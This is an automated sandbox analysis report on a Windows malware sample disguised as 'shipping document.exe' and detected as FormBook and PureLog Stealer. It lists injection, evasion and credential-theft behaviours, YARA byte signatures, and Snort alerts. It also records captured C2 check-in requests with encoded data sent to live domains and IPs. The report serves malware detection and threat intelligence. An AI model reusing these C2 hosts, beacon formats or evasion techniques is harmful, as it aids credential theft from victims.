Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
shipping document.exe

Overview

General Information

Sample name:shipping document.exe
Analysis ID:1430793
MD5:180165361384e56db00389733f0c54f5
SHA1:1d48e601e3ba392fafde82b4a7fc0a39fba0a382
SHA256:48ca70c01e870434304ccd508ef88d824b8d3c9588c990402dae450a5e56f73c
Tags:exe
Infos:

Detection

FormBook, PureLog Stealer
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
Yara detected AntiVM3
Yara detected FormBook
Yara detected PureLog Stealer
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
Found direct / indirect Syscall (likely to bypass EDR)
Initial sample is a PE file and has a suspicious name
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • shipping document.exe (PID: 6192 cmdline: "C:\Users\user\Desktop\shipping document.exe" MD5: 180165361384E56DB00389733F0C54F5)
    • shipping document.exe (PID: 5064 cmdline: "C:\Users\user\Desktop\shipping document.exe" MD5: 180165361384E56DB00389733F0C54F5)
      • oWRaEnEJAq.exe (PID: 2132 cmdline: "C:\Program Files (x86)\fCHtILpYpFbWFzXFGNwToQmYRczXdrUMSrMjxIdUESsXVazGuJRZrDpkvESvVQMyw\oWRaEnEJAq.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • openfiles.exe (PID: 2128 cmdline: "C:\Windows\SysWOW64\openfiles.exe" MD5: 50BD10A4C573E609A401114488299D3D)
          • oWRaEnEJAq.exe (PID: 1620 cmdline: "C:\Program Files (x86)\fCHtILpYpFbWFzXFGNwToQmYRczXdrUMSrMjxIdUESsXVazGuJRZrDpkvESvVQMyw\oWRaEnEJAq.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 6044 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000007.00000002.4110883708.00000000046C0000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000007.00000002.4110883708.00000000046C0000.00000004.00000800.00020000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
    • 0x2a6c0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
    • 0x13c2f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
    00000006.00000002.4110968438.0000000003B00000.00000040.00000001.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000006.00000002.4110968438.0000000003B00000.00000040.00000001.00040000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
      • 0x2de99:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
      • 0x17408:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
      00000000.00000002.1680848791.0000000005AD0000.00000004.08000000.00040000.00000000.sdmpJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
        Click to see the 14 entries

        Unpacked PEs

        SourceRuleDescriptionAuthorStrings
        2.2.shipping document.exe.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          2.2.shipping document.exe.400000.0.unpackWindows_Trojan_Formbook_1112e116unknownunknown
          • 0x2ce83:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
          • 0x163f2:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
          2.2.shipping document.exe.400000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
            2.2.shipping document.exe.400000.0.raw.unpackWindows_Trojan_Formbook_1112e116unknownunknown
            • 0x2dc83:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
            • 0x171f2:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
            0.2.shipping document.exe.5ad0000.5.raw.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
              Click to see the 3 entries

              Sigma Signatures

              No Sigma rule has matched

              Snort Signatures

              Timestamp:04/24/24-07:28:11.543102
              SID:2855465
              Source Port:49769
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:04/24/24-07:28:46.802004
              SID:2855464
              Source Port:49778
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:04/24/24-07:26:07.020850
              SID:2855465
              Source Port:49740
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:04/24/24-07:26:49.463195
              SID:2855464
              Source Port:49747
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:04/24/24-07:27:56.800788
              SID:2855465
              Source Port:49765
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:04/24/24-07:28:25.424795
              SID:2855465
              Source Port:49773
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:04/24/24-07:27:50.139936
              SID:2855464
              Source Port:49763
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:04/24/24-07:26:26.677111
              SID:2855464
              Source Port:49743
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:04/24/24-07:28:32.187219
              SID:2855464
              Source Port:49774
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:04/24/24-07:28:40.873036
              SID:2855465
              Source Port:49777
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:04/24/24-07:28:55.307064
              SID:2855465
              Source Port:49781
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:04/24/24-07:29:21.231363
              SID:2855464
              Source Port:49783
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:04/24/24-07:27:05.371216
              SID:2855464
              Source Port:49751
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:04/24/24-07:28:05.904124
              SID:2855464
              Source Port:49767
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:04/24/24-07:27:20.740777
              SID:2855464
              Source Port:49755
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:04/24/24-07:28:17.312788
              SID:2855464
              Source Port:49770
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:04/24/24-07:29:18.390720
              SID:2855464
              Source Port:49782
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:04/24/24-07:27:41.169057
              SID:2855465
              Source Port:49761
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:04/24/24-07:26:32.277775
              SID:2855465
              Source Port:49745
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:04/24/24-07:26:23.075794
              SID:2855464
              Source Port:49742
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:04/24/24-07:27:02.680174
              SID:2855464
              Source Port:49750
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:04/24/24-07:27:32.176814
              SID:2855464
              Source Port:49758
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:04/24/24-07:28:35.078110
              SID:2855464
              Source Port:49775
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:04/24/24-07:26:46.608926
              SID:2855464
              Source Port:49746
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:04/24/24-07:27:10.777632
              SID:2855465
              Source Port:49753
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:04/24/24-07:28:49.635121
              SID:2855464
              Source Port:49779
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:04/24/24-07:27:35.011996
              SID:2855464
              Source Port:49759
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:04/24/24-07:27:26.171805
              SID:2855465
              Source Port:49757
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:04/24/24-07:27:16.511687
              SID:2855464
              Source Port:49754
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:04/24/24-07:28:20.015732
              SID:2855464
              Source Port:49771
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:04/24/24-07:26:55.165807
              SID:2855465
              Source Port:49749
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:04/24/24-07:27:47.299002
              SID:2855464
              Source Port:49762
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:04/24/24-07:28:03.112780
              SID:2855464
              Source Port:49766
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected

              Joe Sandbox Signatures

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Multi AV Scanner detection for submitted file
              Source: shipping document.exeReversingLabs: Detection: 23%
              Source: shipping document.exeVirustotal: Detection: 35%Perma Link
              Yara detected FormBook
              Source: Yara matchFile source: 2.2.shipping document.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.shipping document.exe.400000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000007.00000002.4110883708.00000000046C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000006.00000002.4110968438.0000000003B00000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000002.2032796912.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000008.00000002.4113195669.0000000005770000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000007.00000002.4109844667.0000000002790000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000002.2034898129.0000000002530000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000007.00000002.4110925188.0000000004700000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000002.2034731642.0000000001A80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
              Machine Learning detection for sample
              Source: shipping document.exeJoe Sandbox ML: detected
              Source: shipping document.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: shipping document.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
              Source: Binary string: OpnFiles.pdb source: shipping document.exe, 00000002.00000002.2033082089.00000000011D8000.00000004.00000020.00020000.00000000.sdmp, oWRaEnEJAq.exe, 00000006.00000002.4110369739.00000000014FA000.00000004.00000020.00020000.00000000.sdmp, oWRaEnEJAq.exe, 00000006.00000003.1965995700.00000000014EC000.00000004.00000001.00020000.00000000.sdmp, oWRaEnEJAq.exe, 00000006.00000002.4110369739.00000000014D8000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: oWRaEnEJAq.exe, 00000006.00000002.4109844179.0000000000B7E000.00000002.00000001.01000000.0000000C.sdmp, oWRaEnEJAq.exe, 00000008.00000000.2100219438.0000000000B7E000.00000002.00000001.01000000.0000000C.sdmp
              Source: Binary string: wntdll.pdbUGP source: shipping document.exe, 00000002.00000002.2033450578.0000000001730000.00000040.00001000.00020000.00000000.sdmp, openfiles.exe, 00000007.00000002.4111044686.0000000004870000.00000040.00001000.00020000.00000000.sdmp, openfiles.exe, 00000007.00000003.2033163379.0000000004507000.00000004.00000020.00020000.00000000.sdmp, openfiles.exe, 00000007.00000002.4111044686.0000000004A0E000.00000040.00001000.00020000.00000000.sdmp, openfiles.exe, 00000007.00000003.2035061028.00000000046BE000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: wntdll.pdb source: shipping document.exe, shipping document.exe, 00000002.00000002.2033450578.0000000001730000.00000040.00001000.00020000.00000000.sdmp, openfiles.exe, openfiles.exe, 00000007.00000002.4111044686.0000000004870000.00000040.00001000.00020000.00000000.sdmp, openfiles.exe, 00000007.00000003.2033163379.0000000004507000.00000004.00000020.00020000.00000000.sdmp, openfiles.exe, 00000007.00000002.4111044686.0000000004A0E000.00000040.00001000.00020000.00000000.sdmp, openfiles.exe, 00000007.00000003.2035061028.00000000046BE000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: OpnFiles.pdbGCTL source: shipping document.exe, 00000002.00000002.2033082089.00000000011D8000.00000004.00000020.00020000.00000000.sdmp, oWRaEnEJAq.exe, 00000006.00000002.4110369739.00000000014FA000.00000004.00000020.00020000.00000000.sdmp, oWRaEnEJAq.exe, 00000006.00000003.1965995700.00000000014EC000.00000004.00000001.00020000.00000000.sdmp, oWRaEnEJAq.exe, 00000006.00000002.4110369739.00000000014D8000.00000004.00000020.00020000.00000000.sdmp
              Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_027AB970 FindFirstFileW,FindNextFileW,FindClose,7_2_027AB970
              Source: C:\Windows\SysWOW64\openfiles.exeCode function: 4x nop then xor eax, eax7_2_027993B0

              Networking

              barindex
              Snort IDS alert for network traffic
              Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.4:49740 -> 80.240.20.220:80
              Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.4:49742 -> 157.7.107.63:80
              Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.4:49743 -> 157.7.107.63:80
              Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.4:49745 -> 157.7.107.63:80
              Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.4:49746 -> 172.217.16.36:80
              Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.4:49747 -> 172.217.16.36:80
              Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.4:49749 -> 172.217.16.36:80
              Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.4:49750 -> 203.161.46.103:80
              Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.4:49751 -> 203.161.46.103:80
              Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.4:49753 -> 203.161.46.103:80
              Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.4:49754 -> 162.240.81.18:80
              Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.4:49755 -> 162.240.81.18:80
              Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.4:49757 -> 162.240.81.18:80
              Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.4:49758 -> 217.160.0.111:80
              Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.4:49759 -> 217.160.0.111:80
              Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.4:49761 -> 217.160.0.111:80
              Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.4:49762 -> 64.190.62.22:80
              Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.4:49763 -> 64.190.62.22:80
              Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.4:49765 -> 64.190.62.22:80
              Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.4:49766 -> 118.27.122.214:80
              Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.4:49767 -> 118.27.122.214:80
              Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.4:49769 -> 118.27.122.214:80
              Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.4:49770 -> 34.149.87.45:80
              Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.4:49771 -> 34.149.87.45:80
              Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.4:49773 -> 34.149.87.45:80
              Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.4:49774 -> 31.186.11.254:80
              Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.4:49775 -> 31.186.11.254:80
              Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.4:49777 -> 31.186.11.254:80
              Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.4:49778 -> 91.195.240.19:80
              Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.4:49779 -> 91.195.240.19:80
              Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.4:49781 -> 91.195.240.19:80
              Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.4:49782 -> 91.195.240.19:80
              Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.4:49783 -> 91.195.240.19:80
              Source: Joe Sandbox ViewIP Address: 162.240.81.18 162.240.81.18
              Source: Joe Sandbox ViewIP Address: 64.190.62.22 64.190.62.22
              Source: Joe Sandbox ViewASN Name: UNIFIEDLAYER-AS-1US UNIFIEDLAYER-AS-1US
              Source: Joe Sandbox ViewASN Name: INTERQGMOInternetIncJP INTERQGMOInternetIncJP
              Source: Joe Sandbox ViewASN Name: ONEANDONE-ASBrauerstrasse48DE ONEANDONE-ASBrauerstrasse48DE
              Source: Joe Sandbox ViewASN Name: AS-CHOOPAUS AS-CHOOPAUS
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: global trafficHTTP traffic detected: GET /3g97/?AlB=sdJPX&12l42=0byNfP8xYbFTvv3TFTBCb86kR2BGbvQk+A1BHdxmY/MfvALInVuskjfkuf2FjiBL/p+WASS1FPmyok1wO3yhMgT0gLImR5/DqviqEDtH5dgpFLFfPLyFVKE= HTTP/1.1Host: www.jthzbrdb.funAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
              Source: global trafficHTTP traffic detected: GET /3g97/?12l42=14Ldh71M1tAlq614+H+qL8FcHbYJSqGFN6RtTIloW1xTPtpRPWfTFb1ZY6KJ/sGolC/raog+W4a2BjveEWOkSH7srevI7CXU30k1a21fOzbLf05e9HUvJZA=&AlB=sdJPX HTTP/1.1Host: www.a-two-spa-salon.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
              Source: global trafficHTTP traffic detected: GET /3g97/?12l42=ZDaHJbFbnHAFPJixhC0W5VJcO+3r+/EbU9/fBM2jNZ9+Ym38hIZ/X5pUYkV2fcPscAyJxVIUpy5G03sBlccn/BoOXNW31gfQYe8OGfTtnGJDjF2r8y9L4VM=&AlB=sdJPX HTTP/1.1Host: www.mz3fk6g3.sbsAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
              Source: global trafficHTTP traffic detected: GET /3g97/?AlB=sdJPX&12l42=meGryHO7z/6rT923FBL9q9LP9fsOajdjArpVhNvG0WuyKOeyc4yYaP5CwAgWJzIE3e4WxKJNZpro8/ttq32sXWhgj4qMLx7ltRSWVCmHVfZWVpKDtZXBa18= HTTP/1.1Host: www.heldhold.lifeAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
              Source: global trafficHTTP traffic detected: GET /3g97/?12l42=i+yp5adQUIH0VEgvOjK1asLzAf4iESqSDXIw4u3g+VG2ev6y5D4E1hL0oESk2gA2rBhm9fxiezQ8IT1HT+LmxelGkpS4OcyZPgZgITeIYkhl82tlqROkzZ0=&AlB=sdJPX HTTP/1.1Host: www.tavernadoheroi.storeAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
              Source: global trafficHTTP traffic detected: GET /3g97/?AlB=sdJPX&12l42=pss1I4hPKcXAgTeMienjdKFyes9H9oPLrlXUMEqkxJwN3Lu9fPUDc8IPlpsJO9uNl7TAjBTqm2QSFPkGLslINQQyxLsDbCNKxleUNo2npjmmo3Auov63B2Q= HTTP/1.1Host: www.carliente.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
              Source: global trafficHTTP traffic detected: GET /3g97/?12l42=+UthD+705U1ao7DlNG8D0XAg53Vx3iw389CE+agLgXg1A2DbEeFYSszaWdWCIKr2NLn015a/QKEJl6wBw76YOQKFwTcvF/Pv+Bjw8BucK5rNlKIw4A0tIOg=&AlB=sdJPX HTTP/1.1Host: www.paydayloans3.shopAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
              Source: global trafficHTTP traffic detected: GET /3g97/?AlB=sdJPX&12l42=NDJWYY+b4MJOe0SOZhyP3/gD5HDsZQ87d1VJjuxPOAPtwNnLRfPhezVGmkxSEIZ/YXBHCU3m0ogYj5Dd6IJsMpuoncQuveGk65BlZhCiT7/R0prs9m7zKG0= HTTP/1.1Host: www.kansaiwoody.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
              Source: global trafficHTTP traffic detected: GET /3g97/?12l42=xT2trqCQSb0YGfwnfC7AAWCSgoebgz86z2nMETOowAc4zyKeScBuNk+zQrcmduROogVqNtfeQZVF2OAhYZAs5wKafa9/anE/xTNtRCFpw92mm1bEow/bC00=&AlB=sdJPX HTTP/1.1Host: www.corvidemporium.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
              Source: global trafficHTTP traffic detected: GET /3g97/?AlB=sdJPX&12l42=chI4PXqGf2akS9KXcN1/fIedDZpx1haPemMkxCQLjjdC+0LHJVcL8RVSGr04qmANi3qgGmUbQWZg1h9oBh32jeRnCnRBYigKMCJed0uSuMGI415b3fHmBd4= HTTP/1.1Host: www.levelstep.onlineAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
              Source: global trafficHTTP traffic detected: GET /3g97/?12l42=SimubthO8j6ps9851O6iFrPFbhU0j9rq0/tYQBfzEgGK5hVM85jEDi8N6ZmkhSeBx8n/pYDrpewbJx/zj6rVSge67MmYz8zyJ6w88vNyo3JtRae+fbqeQKU=&AlB=sdJPX HTTP/1.1Host: www.brothedboil.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
              Source: unknownDNS traffic detected: queries for: www.jthzbrdb.fun
